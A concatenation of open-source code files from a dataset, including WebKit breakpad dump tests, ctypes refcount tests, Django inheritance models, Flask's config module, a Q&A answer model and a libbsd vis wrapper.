obj = IDataHolder()
for key, value in kwargs.items():
setattr(obj, key, value)
return obj
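# Example (illustrative):
#
#     planet = makeIDataHolder(oid=42, name='Sol')
#     planet.name   # -> 'Sol'
#
# repr(planet) lists the attributes in sorted key order, which is what the
# __repr__ above is for.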
| gpl-2.0 |
temasek/android_external_chromium_org_third_party_WebKit | Tools/Scripts/webkitpy/layout_tests/breakpad/dump_reader_multipart_unittest.py | 58 | 5192 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import cgi
from webkitpy.common.host import Host
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system.executive_mock import MockExecutive
from webkitpy.layout_tests.breakpad.dump_reader_multipart import DumpReaderMultipart
class TestDumpReaderMultipart(unittest.TestCase):
_MULTIPART_DUMP = [
'--boundary',
'Content-Disposition: form-data; name="prod"',
'',
'content_shell',
'--boundary',
'Content-Disposition: form-data; name="pid"',
'',
'4711',
'--boundary',
'Content-Disposition: form-data; name="upload_file_minidump"; filename="dump"',
'Content-Type: application/octet-stream',
'',
'MDMP',
'--boundary--',
]
def test_check_generate_breakpad_symbols_actually_exists(self):
host = Host()
dump_reader = DumpReaderMultipart(host, build_dir=None)
self.assertTrue(host.filesystem.exists(dump_reader._path_to_generate_breakpad_symbols()))
def test_check_is_functional_breakpad_tools_not_found(self):
host = MockHost()
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertFalse(dump_reader.check_is_functional())
def test_get_pid_from_dump(self):
host = MockHost()
dump_file = '/crash-dumps/dump.dmp'
expected_pid = '4711'
host.filesystem.write_text_file(dump_file, "\r\n".join(TestDumpReaderMultipart._MULTIPART_DUMP))
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
host.filesystem.exists = lambda x: True
# The mock file object returned by open_binary_file_for_reading doesn't
# have readline(), however, the real File object does.
host.filesystem.open_binary_file_for_reading = host.filesystem.open_text_file_for_reading
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertTrue(dump_reader.check_is_functional())
self.assertEqual(expected_pid, dump_reader._get_pid_from_dump(dump_file))
def test_get_stack_from_dump(self):
host = MockHost()
dump_file = '/crash-dumps/dump.dmp'
host.filesystem.write_text_file(dump_file, "\r\n".join(TestDumpReaderMultipart._MULTIPART_DUMP))
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
host.filesystem.exists = lambda x: True
# The mock file object returned by open_binary_file_for_reading doesn't
# have readline(); the real file object does.
host.filesystem.open_binary_file_for_reading = host.filesystem.open_text_file_for_reading
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertTrue(dump_reader.check_is_functional())
self.assertEqual("MOCK output of child process", dump_reader._get_stack_from_dump(dump_file))
self.assertEqual(2, len(host.executive.calls))
cmd_line = " ".join(host.executive.calls[0])
self.assertIn('generate_breakpad_symbols.py', cmd_line)
cmd_line = " ".join(host.executive.calls[1])
self.assertIn('minidump_stackwalk', cmd_line)
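# For reference, a minimal standalone sketch of one way to pull the "pid"
# field out of a multipart body shaped like _MULTIPART_DUMP, using only the
# standard library (a hypothetical helper, not part of webkitpy, and not
# necessarily how DumpReaderMultipart itself parses the dump):
def _example_parse_pid(dump_text, boundary='boundary'):
    from StringIO import StringIO
    parts = cgi.parse_multipart(StringIO(dump_text), {'boundary': boundary})
    return parts['pid'][0]  # '4711' for the dump defined above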
| bsd-3-clause |
jruiperezv/ANALYSE | common/test/acceptance/pages/studio/html_component_editor.py | 115 | 1139 | from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from component_editor import ComponentEditorView
class HtmlComponentEditorView(ComponentEditorView):
"""
Represents the rendered view of an HTML component editor.
"""
def set_content_and_save(self, content):
"""
Types content into the html component and presses Save.
"""
self.set_content(content)
self.save()
def set_content_and_cancel(self, content):
"""
Types content into the html component and presses Cancel to abort the change.
"""
self.set_content(content)
self.cancel()
def set_content(self, content):
"""
Types content into the html component, leaving the component open.
"""
self.q(css='.edit-xblock-modal .editor-modes .editor-button').click()
editor = self.q(css=self._bounded_selector('.html-editor .mce-edit-area'))[0]
ActionChains(self.browser).click(editor).\
send_keys([Keys.CONTROL, 'a']).key_up(Keys.CONTROL).send_keys(content).perform()
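# Note on the chord above: send_keys([Keys.CONTROL, 'a']) presses CTRL and
# types 'a' while it is held (select all), so the explicit key_up(Keys.CONTROL)
# is required before send_keys(content); without it every following character
# would also be sent as a CTRL chord.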
| agpl-3.0 |
amyvmiwei/kbengine | kbe/res/scripts/common/Lib/ctypes/test/test_refcounts.py | 114 | 2576 | import unittest
from test import support
import ctypes
import gc
MyCallback = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)
OtherCallback = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int, ctypes.c_ulonglong)
import _ctypes_test
dll = ctypes.CDLL(_ctypes_test.__file__)
class RefcountTestCase(unittest.TestCase):
@support.refcount_test
def test_1(self):
from sys import getrefcount as grc
f = dll._testfunc_callback_i_if
f.restype = ctypes.c_int
f.argtypes = [ctypes.c_int, MyCallback]
def callback(value):
# print("called back with", value)
return value
self.assertEqual(grc(callback), 2)
cb = MyCallback(callback)
self.assertGreater(grc(callback), 2)
result = f(-10, cb)
self.assertEqual(result, -18)
cb = None
gc.collect()
self.assertEqual(grc(callback), 2)
@support.refcount_test
def test_refcount(self):
from sys import getrefcount as grc
def func(*args):
pass
# this is the standard refcount for func
self.assertEqual(grc(func), 2)
# the CFuncPtr instance holds at least one refcount on func:
f = OtherCallback(func)
self.assertGreater(grc(func), 2)
# and may release it again
del f
self.assertGreaterEqual(grc(func), 2)
# but now it must be gone
gc.collect()
self.assertEqual(grc(func), 2)
class X(ctypes.Structure):
_fields_ = [("a", OtherCallback)]
x = X()
x.a = OtherCallback(func)
# the CFuncPtr instance holds at least one refcount on func:
self.assertGreater(grc(func), 2)
# and may release it again
del x
self.assertGreaterEqual(grc(func), 2)
# and now it must be gone again
gc.collect()
self.assertEqual(grc(func), 2)
f = OtherCallback(func)
# the CFuncPtr instance holds at least one refcount on func:
self.assertGreater(grc(func), 2)
# create a cycle
f.cycle = f
del f
gc.collect()
self.assertEqual(grc(func), 2)
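# A minimal sketch of the rule these tests exercise (helper names are
# hypothetical, not part of this test suite): ctypes does not keep Python
# callbacks alive, so the CFUNCTYPE wrapper must be stored for as long as
# foreign code might invoke it.
_live_callbacks = []

def make_persistent_callback(py_func, functype=MyCallback):
    wrapper = functype(py_func)
    _live_callbacks.append(wrapper)  # dropping this reference may free the thunk
    return wrapper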
class AnotherLeak(unittest.TestCase):
def test_callback(self):
import sys
proto = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int, ctypes.c_int)
def func(a, b):
return a * b * 2
f = proto(func)
a = sys.getrefcount(ctypes.c_int)
f(1, 2)
self.assertEqual(sys.getrefcount(ctypes.c_int), a)
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 |
oberlin/django | tests/model_inheritance/models.py | 227 | 4810 | """
XX. Model inheritance
Model inheritance exists in two varieties:
- abstract base classes which are a way of specifying common
information inherited by the subclasses. They don't exist as a separate
model.
- non-abstract base classes (the default), which are models in their own
right with their own database tables and everything. Their subclasses
have references back to them, created automatically.
Both styles are demonstrated here.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
#
# Abstract base classes
#
@python_2_unicode_compatible
class CommonInfo(models.Model):
name = models.CharField(max_length=50)
age = models.PositiveIntegerField()
class Meta:
abstract = True
ordering = ['name']
def __str__(self):
return '%s %s' % (self.__class__.__name__, self.name)
class Worker(CommonInfo):
job = models.CharField(max_length=50)
class Student(CommonInfo):
school_class = models.CharField(max_length=10)
class Meta:
pass
#
# Abstract base classes with related models
#
class Post(models.Model):
title = models.CharField(max_length=50)
@python_2_unicode_compatible
class Attachment(models.Model):
post = models.ForeignKey(Post, models.CASCADE, related_name='attached_%(class)s_set')
content = models.TextField()
class Meta:
abstract = True
def __str__(self):
return self.content
class Comment(Attachment):
is_spam = models.BooleanField(default=False)
class Link(Attachment):
url = models.URLField()
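# With the %(class)s placeholder above, each concrete subclass gets its own
# reverse accessor on Post: post.attached_comment_set and post.attached_link_set.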
#
# Multi-table inheritance
#
@python_2_unicode_compatible
class Chef(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return "%s the chef" % self.name
@python_2_unicode_compatible
class Place(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=80)
def __str__(self):
return "%s the place" % self.name
class Rating(models.Model):
rating = models.IntegerField(null=True, blank=True)
class Meta:
abstract = True
ordering = ['-rating']
@python_2_unicode_compatible
class Restaurant(Place, Rating):
serves_hot_dogs = models.BooleanField(default=False)
serves_pizza = models.BooleanField(default=False)
chef = models.ForeignKey(Chef, models.SET_NULL, null=True, blank=True)
class Meta(Rating.Meta):
db_table = 'my_restaurant'
def __str__(self):
return "%s the restaurant" % self.name
@python_2_unicode_compatible
class ItalianRestaurant(Restaurant):
serves_gnocchi = models.BooleanField(default=False)
def __str__(self):
return "%s the italian restaurant" % self.name
@python_2_unicode_compatible
class Supplier(Place):
customers = models.ManyToManyField(Restaurant, related_name='provider')
def __str__(self):
return "%s the supplier" % self.name
@python_2_unicode_compatible
class ParkingLot(Place):
# An explicit link to the parent (we can control the attribute name).
parent = models.OneToOneField(Place, models.CASCADE, primary_key=True, parent_link=True)
main_site = models.ForeignKey(Place, models.CASCADE, related_name='lot')
def __str__(self):
return "%s the parking lot" % self.name
#
# Abstract base classes with related models where the sub-class has the
# same name in a different app and inherits from the same abstract base
# class.
# NOTE: The actual API tests for the following classes are in
# model_inheritance_same_model_name/models.py; they are defined
# here in order to create the name conflict between apps
#
class Title(models.Model):
title = models.CharField(max_length=50)
class NamedURL(models.Model):
title = models.ForeignKey(Title, models.CASCADE, related_name='attached_%(app_label)s_%(class)s_set')
url = models.URLField()
class Meta:
abstract = True
@python_2_unicode_compatible
class Copy(NamedURL):
content = models.TextField()
def __str__(self):
return self.content
class Mixin(object):
def __init__(self):
self.other_attr = 1
super(Mixin, self).__init__()
class MixinModel(models.Model, Mixin):
pass
class Base(models.Model):
titles = models.ManyToManyField(Title)
class SubBase(Base):
sub_id = models.IntegerField(primary_key=True)
class GrandParent(models.Model):
first_name = models.CharField(max_length=80)
last_name = models.CharField(max_length=80)
email = models.EmailField(unique=True)
class Meta:
unique_together = ('first_name', 'last_name')
class Parent(GrandParent):
pass
class Child(Parent):
pass
class GrandChild(Child):
pass
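# A minimal usage sketch (assumes a configured database with migrations
# applied; not part of the original test models): multi-table inheritance
# links each child row to its parent row through an implicit one-to-one key,
# so the same object is reachable from every ancestor table.
def _example_mti_lookup():
    place = ItalianRestaurant.objects.create(
        name='Ristorante Miron', address='1234 W. Ash St.')
    # Walk back down from the base table via the auto-created accessors:
    return Place.objects.get(pk=place.pk).restaurant.italianrestaurant == place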
| bsd-3-clause |
cataliniordache/Human-Computer-Interaction-Project | RestfulServices/flask/lib/python2.7/site-packages/flask/config.py | 781 | 6234 | # -*- coding: utf-8 -*-
"""
flask.config
~~~~~~~~~~~~
Implements the configuration-related objects.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import imp
import os
import errno
from werkzeug.utils import import_string
from ._compat import string_types
class ConfigAttribute(object):
"""Makes an attribute forward to the config"""
def __init__(self, name, get_converter=None):
self.__name__ = name
self.get_converter = get_converter
def __get__(self, obj, type=None):
if obj is None:
return self
rv = obj.config[self.__name__]
if self.get_converter is not None:
rv = self.get_converter(rv)
return rv
def __set__(self, obj, value):
obj.config[self.__name__] = value
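# A minimal usage sketch (a hypothetical class, not part of Flask): the
# descriptor forwards attribute access to the owner's `config` mapping and
# applies the optional converter on reads.
class _ConfigAttributeDemo(object):
    debug = ConfigAttribute('DEBUG', get_converter=bool)

    def __init__(self):
        self.config = {'DEBUG': 0}

# _ConfigAttributeDemo().debug evaluates to False, and assigning to .debug
# writes straight through to config['DEBUG'].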
class Config(dict):
"""Works exactly like a dict but provides ways to fill it from files
or special dictionaries. There are two common patterns to populate the
config.
Either you can fill the config from a config file::
app.config.from_pyfile('yourconfig.cfg')
Or alternatively you can define the configuration options in the
module that calls :meth:`from_object` or provide an import path to
a module that should be loaded. It is also possible to tell it to
use the same module and with that provide the configuration values
just before the call::
DEBUG = True
SECRET_KEY = 'development key'
app.config.from_object(__name__)
In both cases (loading from any Python file or loading from modules),
only uppercase keys are added to the config. This makes it possible to use
lowercase values in the config file for temporary values that are not added
to the config or to define the config keys in the same file that implements
the application.
Probably the most interesting way to load configurations is from an
environment variable pointing to a file::
app.config.from_envvar('YOURAPPLICATION_SETTINGS')
In this case before launching the application you have to set this
environment variable to the file you want to use. On Linux and OS X
use the export statement::
export YOURAPPLICATION_SETTINGS='/path/to/config/file'
On Windows, use `set` instead.
:param root_path: path to which files are read relative from. When the
config object is created by the application, this is
the application's :attr:`~flask.Flask.root_path`.
:param defaults: an optional dictionary of default values
"""
def __init__(self, root_path, defaults=None):
dict.__init__(self, defaults or {})
self.root_path = root_path
def from_envvar(self, variable_name, silent=False):
"""Loads a configuration from an environment variable pointing to
a configuration file. This is basically just a shortcut with nicer
error messages for this line of code::
app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS'])
:param variable_name: name of the environment variable
:param silent: set to `True` if you want silent failure for missing
files.
:return: bool. `True` if able to load config, `False` otherwise.
"""
rv = os.environ.get(variable_name)
if not rv:
if silent:
return False
raise RuntimeError('The environment variable %r is not set '
'and as such configuration could not be '
'loaded. Set this variable and make it '
'point to a configuration file' %
variable_name)
return self.from_pyfile(rv, silent=silent)
def from_pyfile(self, filename, silent=False):
"""Updates the values in the config from a Python file. This function
behaves as if the file was imported as module with the
:meth:`from_object` function.
:param filename: the filename of the config. This can either be an
absolute filename or a filename relative to the
root path.
:param silent: set to `True` if you want silent failure for missing
files.
.. versionadded:: 0.7
`silent` parameter.
"""
filename = os.path.join(self.root_path, filename)
d = imp.new_module('config')
d.__file__ = filename
try:
with open(filename) as config_file:
exec(compile(config_file.read(), filename, 'exec'), d.__dict__)
except IOError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR):
return False
e.strerror = 'Unable to load configuration file (%s)' % e.strerror
raise
self.from_object(d)
return True
def from_object(self, obj):
"""Updates the values from the given object. An object can be of one
of the following two types:
- a string: in this case the object with that name will be imported
- an actual object reference: that object is used directly
Objects are usually either modules or classes.
Just the uppercase variables in that object are stored in the config.
Example usage::
app.config.from_object('yourapplication.default_config')
from yourapplication import default_config
app.config.from_object(default_config)
You should not use this function to load the actual configuration but
rather configuration defaults. The actual config should be loaded
with :meth:`from_pyfile` and ideally from a location not within the
package because the package might be installed system wide.
:param obj: an import name or object
"""
if isinstance(obj, string_types):
obj = import_string(obj)
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, dict.__repr__(self))
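# A minimal standalone sketch (hypothetical names, not part of Flask) of the
# "only uppercase keys" rule that from_object enforces; guarded so importing
# this module stays free of side effects:
if __name__ == '__main__':
    class _DefaultConfig(object):
        DEBUG = False
        secret = 'ignored'  # lowercase, so never copied into the config

    _cfg = Config(root_path='.')
    _cfg.from_object(_DefaultConfig)
    assert 'DEBUG' in _cfg and 'secret' not in _cfg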
| apache-2.0 |
uniqna/uniqna | threads/models.py | 2 | 2396 | from __future__ import unicode_literals
from django.db import models
from django.urls import reverse
from django.utils import timezone
from django.utils.encoding import uri_to_iri
from django.contrib.auth.models import User
from mptt.models import MPTTModel, TreeForeignKey
from post.models import Question
from root.algorithms import vote_score
from root.algorithms.parser import parse
class ManagerExtender(models.Manager):
def score_update(self):
for answer in self.all():
answer.set_score()
class Answer(MPTTModel):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True, on_delete=models.CASCADE)
metatype = models.CharField(max_length=20, default="question", blank=False)
description = models.TextField(blank=False, null=False)
answer_author = models.CharField("Author", max_length=100, default="anon")
created_time = models.DateTimeField(default=timezone.now)
edited_time = models.DateTimeField(default=timezone.now, editable=True)
edited = models.BooleanField(default=False)
ups = models.ManyToManyField(User, related_name='upvotes', blank=True)
downs = models.ManyToManyField(User, related_name='downvotes', blank=True)
points = models.IntegerField(default=1)
score = models.DecimalField(default=0, max_digits=20, decimal_places=17)
objects = ManagerExtender()
def __str__(self):
return str(self.description)
def get_absolute_url(self):
if self.parent:
url = reverse("reply", args=[self.question.id, self.id])
else:
url = reverse("answer", args=[self.question.id, self.id])
# reverse() encodes URL characters such as # to %23;
# uri_to_iri changes them back again.
url = uri_to_iri(url)
return url
def get_time(self):
t = timezone.localtime(self.created_time)
return "{}-{}-{} {}:{}".format(t.day, t.month, t.year, t.hour, t.minute)
def get_edited_time(self):
t = timezone.localtime(self.edited_time)
return "{}-{}-{} {}:{}".format(t.day, t.month, t.year, t.hour, t.minute)
def set_edited_time(self):
self.edited = True
self.edited_time = timezone.now()
def set_score(self):
self.points = self.ups.count() - self.downs.count()
self.score = vote_score.confidence(self.ups.count(), self.downs.count())
self.save()
def parse(self):
return parse(self)
class MPTTMeta:
order_insertion_by = ['-score']
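# For reference, a standalone sketch of the Wilson score lower bound commonly
# used for vote ranking; it is an assumption that root.algorithms.vote_score
# implements confidence() this way (z ~ 1.2816 gives the 80% interval):
from math import sqrt

def _wilson_lower_bound(ups, downs, z=1.281551565545):
    n = ups + downs
    if n == 0:
        return 0.0
    phat = ups / float(n)
    return ((phat + z * z / (2 * n)
             - z * sqrt((phat * (1 - phat) + z * z / (4 * n)) / n))
            / (1 + z * z / n))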
| bsd-3-clause |
rllynguh/C.B.U.L.M.S. | vendor/psy/psysh/test/tools/vis.py | 710 | 3428 | """
vis.py
======
Ctypes based module to access libbsd's strvis & strunvis functions.
The `vis` function is the equivalent of strvis.
The `unvis` function is the equivalent of strunvis.
All functions accept a unicode string as input and return a unicode string.
Constants:
----------
* to select alternate encoding format
`VIS_OCTAL`: use octal \ddd format
`VIS_CSTYLE`: use \[nrft0..] where appropriate
* to alter set of characters encoded
(default is to encode all non-graphic characters except space, tab, and newline).
`VIS_SP`: also encode space
`VIS_TAB`: also encode tab
`VIS_NL`: also encode newline
`VIS_WHITE`: same as (VIS_SP | VIS_TAB | VIS_NL)
`VIS_SAFE`: only encode "unsafe" characters
* other
`VIS_NOSLASH`: inhibit printing '\'
`VIS_HTTP1808`: http-style escape % hex hex
`VIS_HTTPSTYLE`: http-style escape % hex hex
`VIS_MIMESTYLE`: mime-style escape = HEX HEX
`VIS_HTTP1866`: http-style &#num; or &string;
`VIS_NOESCAPE`: don't decode `\`
`VIS_GLOB`: encode glob(3) magic characters
:Authors:
- ju1ius (http://github.com/ju1ius)
:Version: 1
:Date: 2014-01-05
"""
from ctypes import CDLL, c_char_p, c_int
from ctypes.util import find_library
__all__ = [
'vis', 'unvis',
'VIS_OCTAL', 'VIS_CSTYLE',
'VIS_SP', 'VIS_TAB', 'VIS_NL', 'VIS_WHITE', 'VIS_SAFE',
'VIS_NOSLASH', 'VIS_HTTP1808', 'VIS_HTTPSTYLE', 'VIS_MIMESTYLE',
'VIS_HTTP1866', 'VIS_NOESCAPE', 'VIS_GLOB'
]
#############################################################
# Constants from bsd/vis.h
#############################################################
#to select alternate encoding format
VIS_OCTAL = 0x0001
VIS_CSTYLE = 0x0002
# to alter set of characters encoded
# (default is to encode all non-graphic characters except space, tab, and newline).
VIS_SP = 0x0004
VIS_TAB = 0x0008
VIS_NL = 0x0010
VIS_WHITE = VIS_SP | VIS_TAB | VIS_NL
VIS_SAFE = 0x0020
# other
VIS_NOSLASH = 0x0040
VIS_HTTP1808 = 0x0080
VIS_HTTPSTYLE = 0x0080
VIS_MIMESTYLE = 0x0100
VIS_HTTP1866 = 0x0200
VIS_NOESCAPE = 0x0400
VIS_GLOB = 0x1000
#############################################################
# Import libbsd/vis functions
#############################################################
_libbsd = CDLL(find_library('bsd'))
_strvis = _libbsd.strvis
_strvis.argtypes = [c_char_p, c_char_p, c_int]
_strvis.restype = c_int
_strunvis = _libbsd.strunvis
_strunvis.argtypes = [c_char_p, c_char_p]
_strunvis.restype = c_int
def vis(src, flags=VIS_WHITE):
"""
Encodes the string `src` into libbsd's vis encoding.
`flags` must be one of the VIS_* constants
C definition:
int strvis(char *dst, char *src, int flags);
"""
src = bytes(src, 'utf-8')
dst_p = c_char_p(bytes(len(src) * 4))
src_p = c_char_p(src)
flags = c_int(flags)
bytes_written = _strvis(dst_p, src_p, flags)
if -1 == bytes_written:
raise RuntimeError('vis failed to encode string "{}"'.format(src))
return dst_p.value.decode('utf-8')
def unvis(src):
"""
Decodes a string encoded by vis.
C definition:
int strunvis(char *dst, char *src);
"""
src = bytes(src, 'utf-8')
dst_p = c_char_p(bytes(len(src)))
src_p = c_char_p(src)
bytes_written = _strunvis(dst_p, src_p)
if -1 == bytes_written:
raise RuntimeError('unvis failed to decode string "{}"'.format(src))
return dst_p.value.decode('utf-8')
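# A minimal round-trip sketch (requires libbsd to be installed; guarded so
# importing this module stays free of side effects):
if __name__ == '__main__':
    encoded = vis('tab\there', flags=VIS_WHITE)
    assert unvis(encoded) == 'tab\there'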
| gpl-3.0 |